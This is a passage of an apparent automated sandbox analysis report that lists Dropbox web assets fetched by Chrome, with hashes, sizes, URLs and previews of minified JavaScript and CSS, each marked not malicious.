                                                    Entropy (8bit):5.062487413501931
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:68F4DCC38C39E6A476232BA165B273B3
                                                    SHA1:66055EBB45150FDDC4D16E10CB21C6A6D34EEBBD
                                                    SHA-256:7F63516A033A519F116EFF912F85D854C87D40C0DFC19843FBBC4188CE3BA95E
                                                    SHA-512:CF863C1FD77DE696FBBD98D7ED9B3879FE7AB91CE837A5EAF2EBD3F126EF6141F3BC4894391537E583E1C90F722C0507384289D5CA94A772323ED843087900ED
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_data_ui","./e_file_viewer_static_scl_page_folder","./c_react_query_helpers_queries_file_content_metadata"],(function(e,t,n,o){"use strict";const i=n.atom(!1);const a=e=>e!==n.PreviewType.CloudDoc;e.exhaustiveCheck=e=>e,e.getCommentIdsFromThreads=e=>{const t=[];return e.forEach((e=>{e.comments.forEach((e=>{t.push(e.id)}))})),t},e.isAnnotating=function(e){return"annotating"===e||"annotating-ax"===e},e.isAnnotatingAccessible=function(e){return"annotating-ax"===e},e.isEditingAnnotation=function(e){return"annotating"===e||"annotating-ax"===e||"commenting"===e},e.isEditingTimestampAnnotation=e=>"commenting"===e||"annotating-ax"===e,e.isSupportedPreviewType=function(e){const t=n.resolvePreviewTypeFromExtension(n.getFileExtension(e));return a(t)},e.shouldShowCommentsForPreviewType=a,e.useFrameRate=function(e){var t;const{data:n}=o.useFileContentMetadataQuery(e),i=null===(t=null==n?void 0:n.apiData)||void 0===t?void 0:t.metadata;if(i)return"video"===i[".tag"]?i.frame
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (304)
                                                    Category:downloaded
                                                    Size (bytes):305
                                                    Entropy (8bit):4.931439734894977
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4E2CC091FAC48A36F2EB401FA6ECE06B
                                                    SHA1:AC35B42D5B1FF5B592A44574459A1C6CE6DFBE44
                                                    SHA-256:EA511EB41E9199AEC50864F7CD7862DEF7BE3AE5C232DBC066AC353EA56FEC8D
                                                    SHA-512:B7E439B7D5A48FB1D52EC78BB0CC72622717F37CCB03AA988741D9757C8CC3AFBE7FE0ECDA12970916CDF484ED9280613E7E1777942CC64A517886516D8E3692
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.css
                                                    Preview:.fingerprintjsComponent{z-index:1000;position:fixed;top:0;left:0;width:100%;height:100%;visibility:hidden}.fingerprintjsDiv{margin-left:auto;margin-right:auto;visibility:hidden}body #one-tap-fpjs-container~iframe[src='about:blank'][style*='visibility: hidden']{top:-100% !important;left:-100% !important}.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3509)
                                                    Category:downloaded
                                                    Size (bytes):9382
                                                    Entropy (8bit):4.873211498054136
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:320915DCA4FCC14B76A6609AF3445D98
                                                    SHA1:F51A66AB752668770DE4D50BB87C323EDC1AF699
                                                    SHA-256:A2EFE4341FFFAC8BD9F6450113FBAC5B5D96738DCD0AF410E16C8C7055E0B652
                                                    SHA-512:C1865BA01E864A629DF06E33F958B0D52B8CF2D9FF0DA799768A5E929D1993F99ADD73425824604327966B9DE83731AAA505BD21FAA2EF6EAE324E745A13F216
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-vflMgkV3K.css
                                                    Preview:./* -- typescript/component_libraries/dig-experimental/src/accordion/index.web.css */..exp-dig-AccordionItem,.exp-dig-AccordionWrapper{display:flex;flex-direction:column}.exp-dig-AccordionHeader{align-items:center;border-top:1px solid var(--color__standard__border);cursor:pointer;display:flex}.exp-dig-AccordionHeader-spacing--standard{padding:var(--spacing__unit--1_5) var(--spacing__unit--2)}.exp-dig-AccordionHeader-spacing--small{padding:var(--spacing__base_unit)}.exp-dig-AccordionHeader-spacing--large{padding:var(--spacing__unit--3)}.exp-dig-AccordionHeader:focus{box-shadow:inset var(--boxshadow__focusring);outline:none}.exp-dig-AccordionHeader:focus:not([data-focus-visible-added]){box-shadow:none}.exp-dig-AccordionHeader-left-accessory{display:flex;flex-shrink:0;margin-right:var(--spacing__base_unit)}.exp-dig-AccordionHeader-title-container{display:flex;flex-direction:column;flex-grow:1}.exp-dig-AccordionHeader-chevron{color:var(--color__faint__text);display:flex}.exp-dig-AccordionH
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (782)
                                                    Category:dropped
                                                    Size (bytes):873
                                                    Entropy (8bit):5.371442034649357
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:94DA50C186A28247167725368C6477F1
                                                    SHA1:933F145188A81A9708F8376F1972F62C5496F0DD
                                                    SHA-256:22C25EC54A437737F94E2BC42B1155D1DA06EEC37A83C0FAE7E3026F78F0A868
                                                    SHA-512:96B046F80AD5B35000488BA2D8E57EE305CFFACC36B4263E0CD3A00043B566A519A2AFDE53CE299D059BC677EA8627BF255CB95B982B168FBF4CEE58A2A308BB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_ts_utils"],(function(e,t){"use strict";e.GetTeamRoutes=function(e){return e.ns("team")},e.HELLOSIGN_SUPPORTED_EXTENSIONS=[".doc",".docx",".pdf",".ppsx",".ppt",".pptx",".jpg",".jpeg",".png"],e.HELLO_SIGN_MAX_FILE_SIZE=4e7,e.HELLO_SIGN_MAX_PAGES=500,e.PAP_Create_SharedLink=function(e){return{class:"share",action:"create",object:"shared_link",properties:e}},e.SIGN_NON_PDF_IN_PDF_EDITOR_SUPPORTED_EXTENSIONS=["doc","docx","ppsx","ppt","pptx","jpg","jpeg","png"],e.assertDropboxDomain=function(e){const t=".dropbox.com",n=document.createElement("a");n.href=e;const o=n.hostname||window.location.hostname;if(-1===o.indexOf(t,o.length-12))throw new Error("Cannot send the CSRF token to "+o)},e.readCsrfToken=function(){return t.Cookies.read("__Host-js_csrf")}}));.//# sourceMappingURL=c_integrations_hellosign_deep_integration_constants.js-vflDor9Io.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (38912)
                                                    Category:downloaded
                                                    Size (bytes):38988
                                                    Entropy (8bit):3.812496057577704
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7E32AE2AAAF995ECB647A5D99BF85459
                                                    SHA1:0A2BE26DD228F44E48087571DB407AF9D6B11221
                                                    SHA-256:60443924CCFF73EB607E9F78BFF8B3930E1638D83D18217BB0110A7F3977B4E2
                                                    SHA-512:B478A295EBA84769B35A35CBAC21F00D89661D6ECEDEBBF492A4255948064BAA8E4BF58154886805AD8CE11C25F5D75C4E175ACC59FAB91866E96A95359342AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-illustrations_hero_remote-work-vflfjKuKq.js
                                                    Preview:define(["exports","react"],(function(c,Z){"use strict";function m(c){if(c&&c.__esModule)return c;var Z=Object.create(null);return c&&Object.keys(c).forEach((function(m){if("default"!==m){var e=Object.getOwnPropertyDescriptor(c,m);Object.defineProperty(Z,m,e.get?e:{enumerable:!0,get:function(){return c[m]}})}})),Z.default=c,Object.freeze(Z)}var e=m(Z);c.RemoteWorkHero=({aspectRatio:c,altText:Z,inverse:m,...t})=>{let l;switch(c){case"16:9":l="0 0 1696 954";break;case"1:1":l="371 0 954 954";break;case"5:6":l="450 0 795 954"}const a="dig-Illustration dig-Illustration-hero"+(m?" dig-Illustration--inverse":"");return e.createElement("svg",{role:"presentation",...t,className:a,viewBox:l,fill:"none",xmlns:"http://www.w3.org/2000/svg"},e.createElement("title",null,Z),e.createElement("g",{fill:"currentColor"},e.createElement("path",{d:"M1529.3 675.801c-22.1 32.2-7.6 74.5-7.9 111-2.3 5.7-5.8-1.9-5.9-4.9-12.9-46-20.1-95.3-40.9-138.3-12.5 33.9 30.2 111.5 37.8 147.4-10 7.4-46.2-70.1-57.8-78.4-1.1 6.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (722)
                                                    Category:downloaded
                                                    Size (bytes):775
                                                    Entropy (8bit):5.399696091634746
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3A5DD28308669490AEC0D4C71E53738B
                                                    SHA1:DA6AB809CC3414B721965F9F8F715AE49B0B449C
                                                    SHA-256:E7E5E91C6272BF632CC28BDDA1D6987A51181127910DA4F9CC755BA381728750
                                                    SHA-512:B10B9A658B7EE70C5D7EE95FB5D4BCDA33D7BCC2CBEC8742856326897C886FC1EFE7FF94A423F18C13E966A6C6FDEFCBB0E29630BFFC76956C41A1004A6BBC32
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_memoize-one-vflOl3Sgw.js
                                                    Preview:define(["exports"],(function(e){"use strict";var r;e.MobileWebActionSource=void 0,(r=e.MobileWebActionSource||(e.MobileWebActionSource={})).MOBILE_ACTION_SHEET="preview_overflow_menu",r.MOBILE_ACTION_BAR="preview_toolbar",r.MOBILE_TITLEBAR="preview_top_nav",r.MOBILE_LEGACY_BANNER="preview_legacy_banner";var n=Number.isNaN||function(e){return"number"==typeof e&&e!=e};function t(e,r){if(e.length!==r.length)return!1;for(var t=0;t<e.length;t++)if(i=e[t],o=r[t],!(i===o||n(i)&&n(o)))return!1;var i,o;return!0}e.memoizeOne=function(e,r){var n;void 0===r&&(r=t);var i,o=[],u=!1;return function(){for(var t=[],v=0;v<arguments.length;v++)t[v]=arguments[v];return u&&n===this&&r(t,o)||(i=e.apply(this,t),u=!0,n=this,o=t),i}}}));.//# sourceMappingURL=c_memoize-one.js-vflbkUeVp.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3560)
                                                    Category:dropped
                                                    Size (bytes):3621
                                                    Entropy (8bit):5.21692567888598
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2A9ED2CDE4A0F2CD2EC5674B4834C8D3
                                                    SHA1:4EEE92276CFB23BFDF79DF123C71B40B07B71AA8
                                                    SHA-256:31DDE334B79FFA2BC12F939A7B0FC14DFFEB5AB6DF1402F676D472D10526519F
                                                    SHA-512:D12AA9A40272217D6CDA4018F64185943522F9CAEC3F877E47E862F216D10AC6308A2A2A18D667EF62B49BBFDB3EBC37239D4BC607621C1462A52B2B1DAD5393
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_flows_constants","./c_flows_redux_reducer","./e_core_exception","./c_flows_redux_selectors"],(function(e,o,t,r,i){"use strict";o.UI_EXPERIMENTS.SAVED_WORKFLOW_TEMPLATE_CREATE,o.UI_EXPERIMENTS.ADOPTION_UI_VARIANT;const n=e=>({type:t.Actions.UpdateWorkflowTriggerStep,payload:e}),l=(e,o)=>({type:t.Actions.UpdateWorkflowActionStep,payload:{id:e,action:o}});function a(e){return{type:t.Actions.SetWorkflowStepsConfig,payload:e}}e.addUserAutomation=function(e){return{type:t.Actions.AddUserAutomation,payload:e}},e.collapseAllWorkflowBuilderSteps=function(){return async(e,o)=>{e(n({isExpanded:!1}));i.getWorkflowBuilderActions(o()).forEach((o=>e(l(o.id,{isExpanded:!1}))))}},e.deleteWorkflowActionStep=e=>({type:t.Actions.DeleteWorkflowActionStep,payload:{id:e}}),e.editUserAutomation=function(e){return{type:t.Actions.EditUserAutomation,payload:e}},e.expandOrCollapseWorkflowActionStep=(e,o)=>l(e,{isExpanded:o}),e.expandOrCollapseWorkflowTriggerStep=e=>n({isExpanded:e}),e.getSa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3482)
                                                    Category:downloaded
                                                    Size (bytes):3483
                                                    Entropy (8bit):5.013030100013651
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:307B92102C1C5D4BAB05FFDB09A621F7
                                                    SHA1:FA9D8945782691344FFFA9328B56D541504E1262
                                                    SHA-256:6F4FC0817FB1A2199B277A69ED2022C6B0524DE34A2CBA7533536D40B6ABA410
                                                    SHA-512:7D30703ECD866603DB82E2F0FC0D233D597F94652013A2B5589550952C75C0001C3573729A81E01C0D911AF8137F4A35C083DE552861C90A24150D469A918903
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig/fonts-vflMHuSEC.css
                                                    Preview:@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflk7bxjs.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflyEJFZg.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Regular-Web-vflJ3txfq.ttf") format("truetype");font-weight:400;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vfl38XiTL.woff2") format("woff2"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflyja8tN.woff") format("woff"),url("/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vflbI0jjP.ttf") format("truetype");font-weight:500;font-style:normal}@font-face{font-family:'Atlas Grotesk Web';font-display:swap;src:url("/static/metaserver/static/fonts/paper-atlasgrot
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (19456)
                                                    Category:downloaded
                                                    Size (bytes):19536
                                                    Entropy (8bit):5.210499589042004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:12C8821DFE8757BE3DF51A369D1B89E3
                                                    SHA1:B348766D1A1B91A9BCF22D724C1CD88E97BDE235
                                                    SHA-256:182D01ACD45CD856EF317D00A1D841D3FE6C5208C0E26B95596522A4E33A022B
                                                    SHA-512:33A8252A2223F5C1E7695D9AF91DC78D2C91502D74930E6127597702C1CE08318B2EA18D7F0B1D4B3CD9A3510AE513A3747E149BCAA22096627D31C1F599D09E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_action_plugins_open_in_action_dropdown-vflEsiCHf.js
                                                    Preview:define(["require","exports","react","./c_action_bar_action_bar_strings","./c_action_plugins_conversion_action_conditions","./e_file_viewer_static_scl_page_folder","./c_unity_utils","./c_flows_conversions_utils","./c_action_plugins_download_action_button","./c_cloud_docs_hooks","./c_extensions_extensions_utils","./e_edison","./c_core_i18n","./c_extensions_open_button_types","./c_ui_sprite","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_dig-icons_assets_ui-icon_line_sidebar-show-right","./c_dig-icons_assets_ui-icon_line_video","./c_dig-icons_assets_ui-icon_line_rewind","./c_dig-icons_assets_ui-icon_line_print","./c_ts_utils","./e_core_exception","./c_lodash","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_browse_models","./c_flows_constants","./c_rep
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (6901)
                                                    Category:downloaded
                                                    Size (bytes):6981
                                                    Entropy (8bit):5.275414657315107
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:64F19CE15CB6498C23D87F97FECF9EEB
                                                    SHA1:D6219028CDA2967783E643DAA6EF7DCCF931AAA8
                                                    SHA-256:5900BCCDBEA16609A4DD92D6C6AF16172135F39E2B8DA3099E4F76BCF36F03D4
                                                    SHA-512:1647260F1FB4A605A05296EEF56E52732BB3DDC2AAF7048EE53BC3C5230664D4975E854F54AF77F5D11A2731948613DE96D44E2A96F645F5477ED870A154AFB6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_photo-editor_plugin_show-edit-plugin-vflZPGc4V.js
                                                    Preview:define(["require","exports","./c_pap-events_docsend_view_docsend_hub_entry_button","./e_file_viewer_static_scl_page_folder","./c_integrations_hellosign_deep_integration_constants","./c_pap-events_sign_save_signature_doc","react","./c_core_i18n","./c_lodash"],(function(e,n,t,i,_,o,r,s,a){"use strict";function l(e){return e&&e.__esModule?e:{default:e}}var u=l(r);function d(e){return e.ns("hellosign")}const c=e=>{let n,t;e.header&&(n=u.default.createElement(i.Modal.Title,null,s.intl.formatMessage(e.header))),e.body&&(t=s.intl.formatMessage(e.body));const _=e.confirmationString||s.defineMessage({id:"4aLDLg",defaultMessage:"OK"});return u.default.createElement(i.Modal,{open:e.isOpen,isCentered:!0,withCloseButton:"Close",onRequestClose:e.close},u.default.createElement(i.Modal.Header,{hasBottomSpacing:"title-standard"},n),u.default.createElement(i.Modal.Body,{hasVerticalSpacing:!1},t),u.default.createElement(i.Modal.Footer,null,e.additionalCloseButton&&u.default.createElement(i.Button,{varian
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (479)
                                                    Category:downloaded
                                                    Size (bytes):536
                                                    Entropy (8bit):5.211285884065814
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4D88BCCFC0777878F47142CEAE37F402
                                                    SHA1:0F85BF92E474E59C230BD74723203A2B989DA63B
                                                    SHA-256:14F6541C246E9F07E1B2DB21199644BF95E0CE4EAB52CC9DD97E16985312A92A
                                                    SHA-512:64E558AC489D557115DF2445BB73C2614DF26236556065E4E11A09370B943EBCAAE5D5C237BBBFDC59CA69638D8137081F3741E9AC679054DA9B0715B3F95FB4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_core_utils_uuid-vflTYi8z8.js
                                                    Preview:define(["exports"],(function(n){"use strict";const t=(()=>{let n,t;const e=[];for(n=0,t=n;n<=255;n++,t=n)e.push((t+256).toString(16).substr(1));return e})();function e(n){return n.map((n=>t[n])).join("")}n.v4=function(){const n=function(){const n=new Uint8Array(16);return window.crypto.getRandomValues(n),n}();n[6]=15&n[6]|64,n[8]=63&n[8]|128;const t=Array.prototype.slice.call(n);return[t.slice(0,4),t.slice(4,6),t.slice(6,8),t.slice(8,10),t.slice(10,16)].map(e).join("-")}}));.//# sourceMappingURL=c_core_utils_uuid.js-vfl9fB27y.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2225)
                                                    Category:downloaded
                                                    Size (bytes):2301
                                                    Entropy (8bit):5.18894260405391
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A2D2E7FE047F22D85E10D4C35D6A7D5B
                                                    SHA1:92C4CCC50B39BCDDA56B66C0BC2BB8E814FA31E8
                                                    SHA-256:07E6642430A69A49B37DEB9D8FB327C7681BDF52213D6EC6C37F56A6979230DC
                                                    SHA-512:88813BF15FAFA0C0B5D780CB0CF5AB6275B4A68FA19E4BBD57ACD98110E07E7651D27C09BB1D56C14D43FA60810B2C662B1C7FF763D1AACC05FB84F53B7F3CEF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_undo-vflotLn_g.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var c=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,c.get?c:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var c=n(t);e.ClosedCaptionsLine=e=>c.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},c.createElement("path",{d:"M8.55 15.5h-.6c-1.351 0-2.45-1.1-2.45-2.45v-2.1C5.5 9.6 6.599 8.5 7.95 8.5h.6C9.901 8.5 11 9.6 11 10.95v.133H9.5v-.133a.95.95 0 0 0-.95-.95h-.6a.95.95 0 0 0-.95.95v2.1c0 .524.426.95.95.95h.6a.95.95 0 0 0 .95-.95v-.133H11v.133c0 1.35-1.099 2.45-2.45 2.45Zm6.869 0h.6c1.351 0 2.45-1.1 2.45-2.45v-.133h-1.5v.133a.95.95 0 0 1-.95.95h-.6a.95.95 0 0 1-.95-.95v-2.1a.95.95 0 0 1 .95-.95h.6a.95.95 0 0 1 .95.95v.133h1.5v-.133c0-1.35-1.099-2.45-2.45-2.45h-.6a2.453 2.453 0 0 0-2.45 2.45v2.1c0 1.35 1.099 2.45 2.45 2.45Z",fill:"currentColor",vec
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3616)
                                                    Category:downloaded
                                                    Size (bytes):3687
                                                    Entropy (8bit):5.156047043536018
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0132E45DB4479911B61DBE7790B6EDE7
                                                    SHA1:26EF1C1B1A611E9A6F0C19D854D68007DAF6E308
                                                    SHA-256:8BF448FF61D52DD5DDFD810655F4DC39AB06CECB6B4C9A8F135115AAFC2C85DE
                                                    SHA-512:9B5E4FF63F47B431E05C5691E14EB1FD68955229CAEA439BAF7F236905C8D5E8D6E43EF782FA4EE734390A391B6C8A8C0D6E0DA2F651E102DC4854C867DA5C35
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_keyboard_bindings-vflATLkXb.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_utils_is_text_preview_on","./c_core_utils_browser_detection"],(function(e,n,r,t,i){"use strict";function o(e){if(e&&e.__esModule)return e;var n=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var t=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(n,r,t.get?t:{enumerable:!0,get:function(){return e[r]}})}})),n.default=e,Object.freeze(n)}var a=o(n);const c=()=>{},y=a.createContext({registerKeyBindings:c,unregisterKeyBindings:c});y.displayName="KeyboardBindingContext";const u=e=>{const{keyboardBindings:n,name:r,scope:t}=e,i=a.useRef(r),o=a.useRef(t||!1),c=a.useContext(y);return a.useEffect((()=>{const e=i.current,r=o.current;return c.registerKeyBindings(n,e,r),()=>{c.unregisterKeyBindings(e,r)}}),[c,n]),null};function l(e){return null!=e&&null!=e.preventDefault}function d(e){return function(n){e(),l(n)&&n.preventDefault()}}function f({dispatch:e,fileViewerId:n,previewK
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):374
                                                    Entropy (8bit):5.109325687973052
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FF67FC0E3D543E3AA1023BB02436F7E9
                                                    SHA1:24AE85118FEC99B33086B3787D66A7F50F76FDB5
                                                    SHA-256:0BC14F3F2360C4E70CFDBC967C419B51E594F447A4603DBF6012136AB7F94A2D
                                                    SHA-512:7573D06020FE4191F1AA40722D09CFBDC93BE943BDC88FAE22D3D141E7D3DD2BA27765FA5BED9B306F384B9A25D49981E2CB422964164D16ACF99992C0E79C9E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/icons-vfl_2f8Dj.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-icons@4.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):359
                                                    Entropy (8bit):5.007460429753451
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D4CAA76238D4B8CC34E1B25DA835DF01
                                                    SHA1:DB6D652EB3408A0F53D185CB80522DF47D124329
                                                    SHA-256:CB6F5A022B7D81157B7EA3DF4FC905AB24A5722347AD8F33D8601C650FDBBAC8
                                                    SHA-512:9FD576FF3345356DF76F243C107FAD884B1679C9594E5C64C5847E8E81E7D95EA1294D8033263E1C9725F37D085717F87916AC84EF463E04805A0D8E1AF403ED
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_react_query_api_helpers_queries_cloud_docs_team_settings-vfl1MqnYj.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_action_plugins_download_action_button"],(function(e,t,s){"use strict";const c=t.createApiv2Query({nsClient:s.GetCloudDocsRoutes,rpc:"team_settings/get"});e.cloudDocsTeamSettingsRequestPackage=c}));.//# sourceMappingURL=c_react_query_api_helpers_queries_cloud_docs_team_settings.js-vflo2gQH0.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2698)
                                                    Category:downloaded
                                                    Size (bytes):2763
                                                    Entropy (8bit):5.315905712487126
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:555DFE1D5AE0E2FE628576AE5664FBE2
                                                    SHA1:A102F1234F767FFD3427C98812900E3A3C82AF88
                                                    SHA-256:A6250B8E3E2D689724E5ED2051813FC9D740ECC91280CA6023ACB8BD764309CD
                                                    SHA-512:F7DD735359DA7B4FAFC29F35CDBCC9399FC8B5B8D82BF333F55DD7F9D8733FA50BCB8DC9C5C3D8CFA0F0E34F7C89B0AFC99D6BF349E954C9568EC22913098105
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_plugin_utils_tilingFunc-vflVV3-HV.js
                                                    Preview:define(["exports"],(function(t){"use strict";const a=t=>t/180*Math.PI,e=({image:t,scale:e,opacity:n,angle:o})=>{const h=a(o),i=document.createElement("canvas"),s=i.getContext("2d");if(!s)throw new Error("Cannot draw on canvas");const c=t.width*e,r=t.height*e;i.width=Math.round(Math.abs(c*Math.cos(h))+Math.abs(r*Math.sin(h))),i.height=Math.round(Math.abs(c*Math.sin(h))+Math.abs(r*Math.cos(h)));let l=0,d=0;return o<90?d=c*Math.sin(h):o<180?(l=-c*Math.cos(h),d=c*Math.sin(h)-r*Math.cos(h)):o<270?(l=-c*Math.cos(h)-r*Math.sin(h),d=-r*Math.cos(h)):l=-r*Math.sin(h),s.globalAlpha=n,s.translate(l,d),s.rotate(-h),s.drawImage(t,0,0,c,r),{canvas:i,actualUnrotatedHeight:r,actualUnrotatedWidth:c}},n=(t,a,e,n,o=!1)=>{t.save(),t.font=`${e}px ${n}`;const h=t.measureText(a);return t.restore(),o?{width:h.width,height:h.actualBoundingBoxAscent+h.actualBoundingBoxDescent||e}:{width:h.width,height:h.fontBoundingBoxAscent+h.fontBoundingBoxDescent||e}},o=({text:t,size:e,fontFamily:o,color:h,opacity:i,angle:s})
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):2457375
                                                    Entropy (8bit):5.594031493583694
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:660542F05F2DCC9E049CE0F79FED411F
                                                    SHA1:DB4CC29F30BA53AF2AE66A5B2AA98188BC0D16B2
                                                    SHA-256:B6DD8ADBB237352D09B7BBB9E5BA26C789471341AE61CEAF2C10222369498E9E
                                                    SHA-512:FF82ECFEE4203C9066EB92075E8A514ADF19F5471F22AED13FDC9F75CD3E8E8E866C51F6844CFB65BABEE77C2266AFBB9E8604952CB3A4DB3E71EEEA6FC6C767
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["module","require","exports","react","./c_core_i18n","./e_edison","./c_ts_utils","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./e_core_exception","./c_core_notify","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","react-dom","./c_lodash","metaserver/static/js/langpack"],(function(e,t,n,a,i,r,o,s,l,c,d,u,_,m,p,f,g,h,E){"use strict";function v(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var a=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,a.get?a:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var b,y=v(a),S=v(g);function T(){return T=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.pr
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (17154)
                                                    Category:downloaded
                                                    Size (bytes):17241
                                                    Entropy (8bit):5.330710200452559
